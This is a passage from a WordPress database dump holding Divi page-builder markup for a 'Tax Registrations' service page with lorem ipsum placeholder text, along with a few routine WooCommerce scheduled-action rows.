filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Tax Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.6\" width=\"54%\" max_width=\"65%\" module_alignment=\"center\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Being Tax Compliant  Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Tax Clearance Certificate\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Import & Export Code Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Salary Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Business Income Tax Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Vat Registration\" use_icon=\"on\" font_icon=\"%%159%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Urgent Vat Registration\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Vat-Registration-final-urgent.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Tax Clearance Certificate \" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Tax-Clearance-Certificate.gif\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Import & Export Code Registration\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Importers-Exporters-Code-final.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Tax Registrations','','inherit','closed','closed','','32714-revision-v1','','','2019-08-14 10:47:42','2019-08-14 08:47:42','',32714,'https://companyregistration.online/32714-revision-v1/',0,'revision','',0),(32720,0,'2019-08-14 09:20:50','2019-08-14 09:20:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53d27d676106.40889020-BC5P5cwmIhF96wOF4ZnFEIOQIYKy3Ejm','','','2019-08-14 11:21:01','2019-08-14 09:21:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32720',0,'scheduled-action','',3),(32721,0,'2019-08-14 09:20:51','2019-08-14 09:20:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53d27d78bfd7.64302735-CLhWVSDR3VxUYPq3Qc3lGhchG1UuP5ep','','','2019-08-14 11:21:01','2019-08-14 09:21:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32721',0,'scheduled-action','',3),(32717,0,'2019-08-14 08:19:51','2019-08-14 08:19:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53c462e1eb28.11411189-5dF9PqPz0KYStqIU9NHqvYyjfA6zte2K','','','2019-08-14 10:20:50','2019-08-14 08:20:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32717',0,'scheduled-action','',3),(32718,0,'2019-08-14 08:19:51','2019-08-14 08:19:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53c462f28486.73364554-BolL3Cv2TRcV5JfOB7EoXdos0xmO6mRw','','','2019-08-14 10:20:50','2019-08-14 08:20:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32718',0,'scheduled-action','',3),(32719,0,'2019-08-14 07:50:33','2019-08-14 07:50:33','[]','woocommerce_update_marketplace_suggestions','','publish','open','closed','','scheduled-action-5d53bd7d91b3c6.09590089-jjwhfBxxGDtMPZF5BAxyWTORckpayuQB','','','2019-08-14 09:51:25','2019-08-14 07:51:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32719',0,'scheduled-action','',3),(32722,3,'2019-08-14 10:42:30','2019-08-14 08:42:30','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" 